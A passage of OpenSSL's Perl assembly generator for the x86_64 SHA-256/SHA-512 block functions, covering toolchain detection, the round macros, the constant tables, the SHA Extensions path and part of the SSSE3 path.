# Ivy Bridge 12.6 10.5(+20%) 10.3(+22%) 8.17 7.22(+13%)
# Haswell 12.2 9.28(+31%) 7.80(+56%) 7.66 5.40(+42%)
# Bulldozer 21.1 13.6(+54%) 13.6(+54%(***)) 13.5 8.58(+57%)
# VIA Nano 23.0 16.5(+39%) - 14.7 -
# Atom 23.0 18.9(+22%) - 14.7 -
# Silvermont 27.4 20.6(+33%) - 17.5 -
#
# (*) whichever best applicable;
# (**) switch from ror to shrd stands for fair share of improvement;
# (***) execution time is fully determined by remaining integer-only
# part, body_00_15; reducing the amount of SIMD instructions
# below certain limit makes no difference/sense; to conserve
# space SHA256 XOP code path is therefore omitted;
$flavour = shift;
$output = shift;
if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
die "can't locate x86_64-xlate.pl";
if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
$avx = ($1>=2.19) + ($1>=2.22);
}
if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
`nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
$avx = ($1>=2.09) + ($1>=2.10);
}
if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
`ml64 2>&1` =~ /Version ([0-9]+)\./) {
$avx = ($1>=10) + ($1>=11);
}
if (!$avx && `$ENV{CC} -v 2>&1` =~ /((?:^clang|LLVM) version|based on LLVM) ([3-9]\.[0-9]+)/) {
$avx = ($2>=3.0) + ($2>3.0);
}
$shaext=1; ### set to zero if compiling for 1.0.1
$avx=1 if (!$shaext && $avx);
open OUT,"| \"$^X\" $xlate $flavour $output";
*STDOUT=*OUT;
if ($output =~ /512/) {
$func="sha512_block_data_order";
$TABLE="K512";
$SZ=8;
@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%rax","%rbx","%rcx","%rdx",
"%r8", "%r9", "%r10","%r11");
($T1,$a0,$a1,$a2,$a3)=("%r12","%r13","%r14","%r15","%rdi");
@Sigma0=(28,34,39);
@Sigma1=(14,18,41);
@sigma0=(1, 8, 7);
@sigma1=(19,61, 6);
$rounds=80;
} else {
$func="sha256_block_data_order";
$TABLE="K256";
$SZ=4;
@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%eax","%ebx","%ecx","%edx",
"%r8d","%r9d","%r10d","%r11d");
($T1,$a0,$a1,$a2,$a3)=("%r12d","%r13d","%r14d","%r15d","%edi");
@Sigma0=( 2,13,22);
@Sigma1=( 6,11,25);
@sigma0=( 7,18, 3);
@sigma1=(17,19,10);
$rounds=64;
}
$ctx="%rdi"; # 1st arg, zapped by $a3
$inp="%rsi"; # 2nd arg
$Tbl="%rbp";
$_ctx="16*$SZ+0*8(%rsp)";
$_inp="16*$SZ+1*8(%rsp)";
$_end="16*$SZ+2*8(%rsp)";
$_rsp="16*$SZ+3*8(%rsp)";
$framesz="16*$SZ+4*8";
sub ROUND_00_15()
{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
my $STRIDE=$SZ;
$STRIDE += 16 if ($i%(16/$SZ)==(16/$SZ-1));
$code.=<<___;
ror \$`$Sigma1[2]-$Sigma1[1]`,$a0
mov $f,$a2
xor $e,$a0
ror \$`$Sigma0[2]-$Sigma0[1]`,$a1
xor $g,$a2 # f^g
mov $T1,`$SZ*($i&0xf)`(%rsp)
xor $a,$a1
and $e,$a2 # (f^g)&e
ror \$`$Sigma1[1]-$Sigma1[0]`,$a0
add $h,$T1 # T1+=h
xor $g,$a2 # Ch(e,f,g)=((f^g)&e)^g
ror \$`$Sigma0[1]-$Sigma0[0]`,$a1
xor $e,$a0
add $a2,$T1 # T1+=Ch(e,f,g)
mov $a,$a2
add ($Tbl),$T1 # T1+=K[round]
xor $a,$a1
xor $b,$a2 # a^b, b^c in next round
ror \$$Sigma1[0],$a0 # Sigma1(e)
mov $b,$h
and $a2,$a3
ror \$$Sigma0[0],$a1 # Sigma0(a)
add $a0,$T1 # T1+=Sigma1(e)
xor $a3,$h # h=Maj(a,b,c)=Ch(a^b,c,b)
add $T1,$d # d+=T1
add $T1,$h # h+=T1
lea $STRIDE($Tbl),$Tbl # round++
___
$code.=<<___ if ($i<15);
add $a1,$h # h+=Sigma0(a)
___
($a2,$a3) = ($a3,$a2);
}
sub ROUND_16_XX()
{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
$code.=<<___;
mov `$SZ*(($i+1)&0xf)`(%rsp),$a0
mov `$SZ*(($i+14)&0xf)`(%rsp),$a2
mov $a0,$T1
ror \$`$sigma0[1]-$sigma0[0]`,$a0
add $a1,$a # modulo-scheduled h+=Sigma0(a)
mov $a2,$a1
ror \$`$sigma1[1]-$sigma1[0]`,$a2
xor $T1,$a0
shr \$$sigma0[2],$T1
ror \$$sigma0[0],$a0
xor $a1,$a2
shr \$$sigma1[2],$a1
ror \$$sigma1[0],$a2
xor $a0,$T1 # sigma0(X[(i+1)&0xf])
xor $a1,$a2 # sigma1(X[(i+14)&0xf])
add `$SZ*(($i+9)&0xf)`(%rsp),$T1
add `$SZ*($i&0xf)`(%rsp),$T1
mov $e,$a0
add $a2,$T1
mov $a,$a1
___
&ROUND_00_15(@_);
}
$code=<<___;
.text
.extern OPENSSL_ia32cap_P
.globl $func
.type $func,\@function,3
.align 16
$func:
___
$code.=<<___ if ($SZ==4 || $avx);
lea OPENSSL_ia32cap_P(%rip),%r11
mov 0(%r11),%r9d
mov 4(%r11),%r10d
mov 8(%r11),%r11d
___
$code.=<<___ if ($SZ==4 && $shaext);
test \$`1<<29`,%r11d # check for SHA
jnz _shaext_shortcut
___
$code.=<<___ if ($avx && $SZ==8);
test \$`1<<11`,%r10d # check for XOP
jnz .Lxop_shortcut
___
$code.=<<___ if ($avx>1);
and \$`1<<8|1<<5|1<<3`,%r11d # check for BMI2+AVX2+BMI1
cmp \$`1<<8|1<<5|1<<3`,%r11d
je .Lavx2_shortcut
___
$code.=<<___ if ($avx);
and \$`1<<30`,%r9d # mask "Intel CPU" bit
and \$`1<<28|1<<9`,%r10d # mask AVX and SSSE3 bits
or %r9d,%r10d
cmp \$`1<<28|1<<9|1<<30`,%r10d
je .Lavx_shortcut
___
$code.=<<___ if ($SZ==4);
test \$`1<<9`,%r10d
jnz .Lssse3_shortcut
___
$code.=<<___;
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$$framesz,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
mov $inp,$_inp # save inp, 2nd arh
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
.Lprologue:
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
jmp .Lloop
.align 16
.Lloop:
mov $B,$a3
lea $TABLE(%rip),$Tbl
xor $C,$a3 # magic
___
for($i=0;$i<16;$i++) {
$code.=" mov $SZ*$i($inp),$T1\n";
$code.=" mov @ROT[4],$a0\n";
$code.=" mov @ROT[0],$a1\n";
$code.=" bswap $T1\n";
&ROUND_00_15($i,@ROT);
unshift(@ROT,pop(@ROT));
}
$code.=<<___;
jmp .Lrounds_16_xx
.align 16
.Lrounds_16_xx:
___
for(;$i<32;$i++) {
&ROUND_16_XX($i,@ROT);
unshift(@ROT,pop(@ROT));
}
$code.=<<___;
cmpb \$0,`$SZ-1`($Tbl)
jnz .Lrounds_16_xx
mov $_ctx,$ctx
add $a1,$A # modulo-scheduled h+=Sigma0(a)
lea 16*$SZ($inp),$inp
add $SZ*0($ctx),$A
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop
mov $_rsp,%rsi
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue:
ret
.size $func,.-$func
___
if ($SZ==4) {
$code.=<<___;
.align 64
.type $TABLE,\@object
$TABLE:
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
.long 0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
.long 0x03020100,0x0b0a0908,0xffffffff,0xffffffff
.long 0x03020100,0x0b0a0908,0xffffffff,0xffffffff
.long 0xffffffff,0xffffffff,0x03020100,0x0b0a0908
.long 0xffffffff,0xffffffff,0x03020100,0x0b0a0908
.asciz "SHA256 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
___
} else {
$code.=<<___;
.align 64
.type $TABLE,\@object
$TABLE:
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0x428a2f98d728ae22,0x7137449123ef65cd
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x3956c25bf348b538,0x59f111f1b605d019
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0x923f82a4af194f9b,0xab1c5ed5da6d8118
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0xd807aa98a3030242,0x12835b0145706fbe
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x72be5d74f27b896f,0x80deb1fe3b1696b1
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0x9bdc06a725c71235,0xc19bf174cf692694
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0xe49b69c19ef14ad2,0xefbe4786384f25e3
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x2de92c6f592b0275,0x4a7484aa6ea6e483
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x5cb0a9dcbd41fbd4,0x76f988da831153b5
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0x983e5152ee66dfab,0xa831c66d2db43210
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xb00327c898fb213f,0xbf597fc7beef0ee4
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0xc6e00bf33da88fc2,0xd5a79147930aa725
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x06ca6351e003826f,0x142929670a0e6e70
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x27b70a8546d22ffc,0x2e1b21385c26c926
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x4d2c6dfc5ac42aed,0x53380d139d95b3df
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x650a73548baf63de,0x766a0abb3c77b2a8
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0x81c2c92e47edaee6,0x92722c851482353b
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xa2bfe8a14cf10364,0xa81a664bbc423001
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xc24b8b70d0f89791,0xc76c51a30654be30
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xd192e819d6ef5218,0xd69906245565a910
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0xf40e35855771202a,0x106aa07032bbd1b8
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x19a4c116b8d2d0c8,0x1e376c085141ab53
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x748f82ee5defb2fc,0x78a5636f43172f60
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x84c87814a1f0ab72,0x8cc702081a6439ec
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0x90befffa23631e28,0xa4506cebde82bde9
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xbef9a3f7b2c67915,0xc67178f2e372532b
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xca273eceea26619c,0xd186b8c721c0c207
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x06f067aa72176fba,0x0a637dc5a2c898a6
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x113f9804bef90dae,0x1b710b35131c471b
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x28db77f523047d84,0x32caab7b40c72493
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x4cc5d4becb3e42b6,0x597f299cfc657e2a
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0x5fcb6fab3ad6faec,0x6c44198c4a475817
.quad 0x0001020304050607,0x08090a0b0c0d0e0f
.quad 0x0001020304050607,0x08090a0b0c0d0e0f
.asciz "SHA512 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
___
}
######################################################################
# SIMD code paths
#
if ($SZ==4 && $shaext) {{{
######################################################################
# Intel SHA Extensions implementation of SHA256 update function.
#
my ($ctx,$inp,$num,$Tbl)=("%rdi","%rsi","%rdx","%rcx");
my ($Wi,$ABEF,$CDGH,$TMP,$BSWAP,$ABEF_SAVE,$CDGH_SAVE)=map("%xmm$_",(0..2,7..10));
my @MSG=map("%xmm$_",(3..6));
$code.=<<___;
.type sha256_block_data_order_shaext,\@function,3
.align 64
sha256_block_data_order_shaext:
_shaext_shortcut:
___
$code.=<<___ if ($win64);
lea `-8-5*16`(%rsp),%rsp
movaps %xmm6,-8-5*16(%rax)
movaps %xmm7,-8-4*16(%rax)
movaps %xmm8,-8-3*16(%rax)
movaps %xmm9,-8-2*16(%rax)
movaps %xmm10,-8-1*16(%rax)
.Lprologue_shaext:
___
$code.=<<___;
lea K256+0x80(%rip),$Tbl
movdqu ($ctx),$ABEF # DCBA
movdqu 16($ctx),$CDGH # HGFE
movdqa 0x200-0x80($Tbl),$TMP # byte swap mask
pshufd \$0x1b,$ABEF,$Wi # ABCD
pshufd \$0xb1,$ABEF,$ABEF # CDAB
pshufd \$0x1b,$CDGH,$CDGH # EFGH
movdqa $TMP,$BSWAP # offload
palignr \$8,$CDGH,$ABEF # ABEF
punpcklqdq $Wi,$CDGH # CDGH
jmp .Loop_shaext
.align 16
.Loop_shaext:
movdqu ($inp),@MSG[0]
movdqu 0x10($inp),@MSG[1]
movdqu 0x20($inp),@MSG[2]
pshufb $TMP,@MSG[0]
movdqu 0x30($inp),@MSG[3]
movdqa 0*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
pshufb $TMP,@MSG[1]
movdqa $CDGH,$CDGH_SAVE # offload
sha256rnds2 $ABEF,$CDGH # 0-3
pshufd \$0x0e,$Wi,$Wi
nop
movdqa $ABEF,$ABEF_SAVE # offload
sha256rnds2 $CDGH,$ABEF
movdqa 1*32-0x80($Tbl),$Wi
paddd @MSG[1],$Wi
pshufb $TMP,@MSG[2]
sha256rnds2 $ABEF,$CDGH # 4-7
pshufd \$0x0e,$Wi,$Wi
lea 0x40($inp),$inp
sha256msg1 @MSG[1],@MSG[0]
sha256rnds2 $CDGH,$ABEF
movdqa 2*32-0x80($Tbl),$Wi
paddd @MSG[2],$Wi
pshufb $TMP,@MSG[3]
sha256rnds2 $ABEF,$CDGH # 8-11
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[3],$TMP
palignr \$4,@MSG[2],$TMP
nop
paddd $TMP,@MSG[0]
sha256msg1 @MSG[2],@MSG[1]
sha256rnds2 $CDGH,$ABEF
movdqa 3*32-0x80($Tbl),$Wi
paddd @MSG[3],$Wi
sha256msg2 @MSG[3],@MSG[0]
sha256rnds2 $ABEF,$CDGH # 12-15
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[0],$TMP
palignr \$4,@MSG[3],$TMP
nop
paddd $TMP,@MSG[1]
sha256msg1 @MSG[3],@MSG[2]
sha256rnds2 $CDGH,$ABEF
___
for($i=4;$i<16-3;$i++) {
$code.=<<___;
movdqa $i*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
sha256msg2 @MSG[0],@MSG[1]
sha256rnds2 $ABEF,$CDGH # 16-19...
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[1],$TMP
palignr \$4,@MSG[0],$TMP
nop
paddd $TMP,@MSG[2]
sha256msg1 @MSG[0],@MSG[3]
sha256rnds2 $CDGH,$ABEF
___
push(@MSG,shift(@MSG));
}
$code.=<<___;
movdqa 13*32-0x80($Tbl),$Wi
paddd @MSG[0],$Wi
sha256msg2 @MSG[0],@MSG[1]
sha256rnds2 $ABEF,$CDGH # 52-55
pshufd \$0x0e,$Wi,$Wi
movdqa @MSG[1],$TMP
palignr \$4,@MSG[0],$TMP
sha256rnds2 $CDGH,$ABEF
paddd $TMP,@MSG[2]
movdqa 14*32-0x80($Tbl),$Wi
paddd @MSG[1],$Wi
sha256rnds2 $ABEF,$CDGH # 56-59
pshufd \$0x0e,$Wi,$Wi
sha256msg2 @MSG[1],@MSG[2]
movdqa $BSWAP,$TMP
sha256rnds2 $CDGH,$ABEF
movdqa 15*32-0x80($Tbl),$Wi
paddd @MSG[2],$Wi
nop
sha256rnds2 $ABEF,$CDGH # 60-63
pshufd \$0x0e,$Wi,$Wi
dec $num
nop
sha256rnds2 $CDGH,$ABEF
paddd $CDGH_SAVE,$CDGH
paddd $ABEF_SAVE,$ABEF
jnz .Loop_shaext
pshufd \$0xb1,$CDGH,$CDGH # DCHG
pshufd \$0x1b,$ABEF,$TMP # FEBA
pshufd \$0xb1,$ABEF,$ABEF # BAFE
punpckhqdq $CDGH,$ABEF # DCBA
palignr \$8,$TMP,$CDGH # HGFE
movdqu $ABEF,($ctx)
movdqu $CDGH,16($ctx)
___
$code.=<<___ if ($win64);
movaps -8-5*16(%rax),%xmm6
movaps -8-4*16(%rax),%xmm7
movaps -8-3*16(%rax),%xmm8
movaps -8-2*16(%rax),%xmm9
movaps -8-1*16(%rax),%xmm10
mov %rax,%rsp
.Lepilogue_shaext:
___
$code.=<<___;
ret
.size sha256_block_data_order_shaext,.-sha256_block_data_order_shaext
___
}}}
{{{
my $a4=$T1;
my ($a,$b,$c,$d,$e,$f,$g,$h);
sub AUTOLOAD() # thunk [simplified] 32-bit style perlasm
{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
my $arg = pop;
$arg = "\$$arg" if ($arg*1 eq $arg);
$code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
}
sub body_00_15 () {
(
'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
'&ror ($a0,$Sigma1[2]-$Sigma1[1])',
'&mov ($a,$a1)',
'&mov ($a4,$f)',
'&ror ($a1,$Sigma0[2]-$Sigma0[1])',
'&xor ($a0,$e)',
'&xor ($a4,$g)', # f^g
'&ror ($a0,$Sigma1[1]-$Sigma1[0])',
'&xor ($a1,$a)',
'&and ($a4,$e)', # (f^g)&e
'&xor ($a0,$e)',
'&add ($h,$SZ*($i&15)."(%rsp)")', # h+=X[i]+K[i]
'&mov ($a2,$a)',
'&xor ($a4,$g)', # Ch(e,f,g)=((f^g)&e)^g
'&ror ($a1,$Sigma0[1]-$Sigma0[0])',
'&xor ($a2,$b)', # a^b, b^c in next round
'&add ($h,$a4)', # h+=Ch(e,f,g)
'&ror ($a0,$Sigma1[0])', # Sigma1(e)
'&and ($a3,$a2)', # (b^c)&(a^b)
'&xor ($a1,$a)',
'&add ($h,$a0)', # h+=Sigma1(e)
'&xor ($a3,$b)', # Maj(a,b,c)=Ch(a^b,c,b)
'&ror ($a1,$Sigma0[0])', # Sigma0(a)
'&add ($d,$h)', # d+=h
'&add ($h,$a3)', # h+=Maj(a,b,c)
'&mov ($a0,$d)',
'&add ($a1,$h);'. # h+=Sigma0(a)
'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
);
}
######################################################################
# SSSE3 code path
#
if ($SZ==4) { # SHA256 only
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
$code.=<<___;
.type ${func}_ssse3,\@function,3
.align 64
${func}_ssse3:
.Lssse3_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*4`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
mov $inp,$_inp # save inp, 2nd arh
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___;
.Lprologue_ssse3:
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
$code.=<<___;
#movdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
#movdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Lloop_ssse3
.align 16
.Lloop_ssse3:
movdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
movdqu 0x00($inp),@X[0]
movdqu 0x10($inp),@X[1]
movdqu 0x20($inp),@X[2]
pshufb $t3,@X[0]
movdqu 0x30($inp),@X[3]
lea $TABLE(%rip),$Tbl
pshufb $t3,@X[1]
movdqa 0x00($Tbl),$t0
movdqa 0x20($Tbl),$t1
pshufb $t3,@X[2]
paddd @X[0],$t0
movdqa 0x40($Tbl),$t2
pshufb $t3,@X[3]
movdqa 0x60($Tbl),$t3
paddd @X[1],$t1
paddd @X[2],$t2
paddd @X[3],$t3
movdqa $t0,0x00(%rsp)
mov $A,$a1
movdqa $t1,0x10(%rsp)
mov $B,$a3
movdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
movdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lssse3_00_47
.align 16
.Lssse3_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub Xupdate_256_SSSE3 () {
(
'&movdqa ($t0,@X[1]);',
'&movdqa ($t3,@X[3])',
'&palignr ($t0,@X[0],$SZ)', # X[1..4]
'&palignr ($t3,@X[2],$SZ);', # X[9..12]
'&movdqa ($t1,$t0)',
'&movdqa ($t2,$t0);',
'&psrld ($t0,$sigma0[2])',
'&paddd (@X[0],$t3);', # X[0..3] += X[9..12]
'&psrld ($t2,$sigma0[0])',
'&pshufd ($t3,@X[3],0b11111010)',# X[14..15]
'&pslld ($t1,8*$SZ-$sigma0[1]);'.
'&pxor ($t0,$t2)',
'&psrld ($t2,$sigma0[1]-$sigma0[0]);'.
'&pxor ($t0,$t1)',
'&pslld ($t1,$sigma0[1]-$sigma0[0]);'.
'&pxor ($t0,$t2);',
'&movdqa ($t2,$t3)',
'&pxor ($t0,$t1);', # sigma0(X[1..4])
'&psrld ($t3,$sigma1[2])',
'&paddd (@X[0],$t0);', # X[0..3] += sigma0(X[1..4])
'&psrlq ($t2,$sigma1[0])',
'&pxor ($t3,$t2);',
'&psrlq ($t2,$sigma1[1]-$sigma1[0])',
'&pxor ($t3,$t2)',
'&pshufb ($t3,$t4)', # sigma1(X[14..15])
'&paddd (@X[0],$t3)', # X[0..1] += sigma1(X[14..15])
'&pshufd ($t3,@X[0],0b01010000)',# X[16..17]
'&movdqa ($t2,$t3);',
'&psrld ($t3,$sigma1[2])',
'&psrlq ($t2,$sigma1[0])',
'&pxor ($t3,$t2);',
'&psrlq ($t2,$sigma1[1]-$sigma1[0])',
'&pxor ($t3,$t2);',
'&movdqa ($t2,16*2*$j."($Tbl)")',
'&pshufb ($t3,$t5)',
'&paddd (@X[0],$t3)' # X[2..3] += sigma1(X[16..17])
);
}
sub SSSE3_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
if (0) {
foreach (Xupdate_256_SSSE3()) { # 36 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
} else { # squeeze extra 4% on Westmere and 19% on Atom
eval(shift(@insns)); #@
&movdqa ($t0,@X[1]);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t3,@X[3]);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&palignr ($t0,@X[0],$SZ); # X[1..4]
eval(shift(@insns));
eval(shift(@insns));
&palignr ($t3,@X[2],$SZ); # X[9..12]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&movdqa ($t1,$t0);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t2,$t0);
eval(shift(@insns)); #@
eval(shift(@insns));
&psrld ($t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t3); # X[0..3] += X[9..12]
eval(shift(@insns)); #@
eval(shift(@insns));
&psrld ($t2,$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&pshufd ($t3,@X[3],0b11111010); # X[4..15]
eval(shift(@insns));
eval(shift(@insns)); #@
&pslld ($t1,8*$SZ-$sigma0[1]);
